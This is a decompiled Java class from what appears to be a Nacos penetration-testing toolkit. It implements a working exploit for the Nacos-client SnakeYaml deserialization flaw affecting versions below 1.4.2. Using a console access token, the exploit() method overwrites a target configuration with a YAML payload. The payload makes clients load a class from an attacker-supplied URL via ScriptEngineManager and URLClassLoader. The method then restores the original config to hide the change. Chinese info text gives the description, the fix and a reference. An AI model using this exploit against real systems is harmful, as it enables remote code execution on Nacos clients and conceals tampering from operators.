package com.alibaba.nacos.exploit;

import com.alibaba.nacos.entity.ExecutionResult;
import com.alibaba.nacos.entity.Vulnerability;
import com.alibaba.nacos.httpclient.MyHttpRequests;
import java.io.UnsupportedEncodingException;
import java.net.URLEncoder;
import java.nio.charset.StandardCharsets;
import java.util.HashMap;
import org.json.JSONObject;
import org.springframework.beans.factory.BeanFactory;

/* loaded from: input_file:com/alibaba/nacos/exploit/Alibaba_Nacos_Client_Yaml_Deserialization.class */
public class Alibaba_Nacos_Client_Yaml_Deserialization implements Vulnerability {
    final String VulName = "Nacos-client Yaml反序列化漏洞";

    @Override // com.alibaba.nacos.entity.Vulnerability
    public String getInfo() {
        getClass();
        return String.format("漏洞名称: %s\n\n漏洞描述: %s\n\n漏洞影响版本: %s\n\n漏洞修复方案: %s\n\n漏洞复现分析: %s\n\n", "Nacos-client Yaml反序列化漏洞", "在Nacos的渗透测试的过程中, 如果获取到了控制台的权限, 可以尝试去修改yaml配置去进行盲打客户端, 导致客户端的命令执行。该漏洞只影响单独使用 nacos-client SDK的用户, 原因在于spring cloud、springboot、dubbo等框架中并非使用的 AbstractConfigChangeListener监听配置, 所以该漏洞只影响了使用AbstractConfigChangeListener监听配置的客户端。", " Nacos-Client < 1.4.2", "升级Nacos-Clinent版本, 在1.4.2版本中已修复了该漏洞, 修复方法为使用SnakeYaml提供的SafeConstructor解析Yaml配置", "https://mp.weixin.qq.com/s/SfAFMiraMKafcISo5IDEAg");
    }

    @Override // com.alibaba.nacos.entity.Vulnerability
    public ExecutionResult check(String str) throws Exception {
        getClass();
        return new ExecutionResult(false, "Nacos-client Yaml反序列化漏洞", null, "请使用Yaml反序列化模块进行验证及其利用");
    }

    @Override // com.alibaba.nacos.entity.Vulnerability
    public ExecutionResult exploit(String str, String... strArr) throws Exception {
        String str2 = strArr[2];
        String str3 = (str.endsWith("/") ? str.substring(0, str.length() - 1) : str) + ("/v1/cs/configs?accessToken=" + str2);
        String str4 = strArr[0];
        String str5 = strArr[1];
        HashMap hashMap = new HashMap();
        hashMap.put("Content-Type", "application/x-www-form-urlencoded");
        hashMap.put("Accept", "application/json");
        MyHttpRequests myHttpRequests = new MyHttpRequests();
        String str6 = null;
        try {
            str6 = convertJsonToUrlParams(myHttpRequests.sendRequest(str + "/v1/cs/configs?show=all&dataId=" + str4 + "&group=" + str5 + "&accessToken=" + str2, "GET", null, hashMap, true).getResponseBody());
        } catch (UnsupportedEncodingException e) {
            e.printStackTrace();
        }
        try {
            myHttpRequests.sendRequest(str3, "POST", "dataId=" + str4 + "&group=" + str5 + "&content=" + URLEncoder.encode("!!javax.script.ScriptEngineManager [\n  !!java.net.URLClassLoader [[\n    !!java.net.URL [\"" + strArr[3] + "\"]\n  ]]\n]", "UTF-8") + "&appName=&desc=&type=yaml&id=&md5=&tenant=&createTime=&modifyTime=&createUser=&createIp=&use=&effect=&schema=&configTags=", hashMap, true);
            Thread.sleep(3000L);
            myHttpRequests.sendRequest(str3, "POST", str6, hashMap, true);
            myHttpRequests.sendRequest(str3, "POST", str6, hashMap, true);
            getClass();
            return new ExecutionResult(true, "Nacos-client Yaml反序列化漏洞", "请检查服务端是否收到请求,若收到则存在漏洞", null);
        } catch (Exception e2) {
            getClass();
            return new ExecutionResult(true, "Nacos-client Yaml反序列化漏洞", "请检查服务端是否收到请求,若收到则存在漏洞", null);
        }
    }

    private static String convertJsonToUrlParams(String str) throws UnsupportedEncodingException {
        JSONObject jSONObject = new JSONObject(str);
        StringBuilder sb = new StringBuilder();
        for (String str2 : jSONObject.keySet()) {
            Object obj = jSONObject.get(str2);
            if (obj != null) {
                if (sb.length() > 0) {
                    sb.append(BeanFactory.FACTORY_BEAN_PREFIX);
                }
                sb.append(URLEncoder.encode(str2, StandardCharsets.UTF_8.toString()));
                sb.append("=");
                sb.append(URLEncoder.encode(obj.toString(), StandardCharsets.UTF_8.toString()));
            }
        }
        return sb.toString();
    }
}
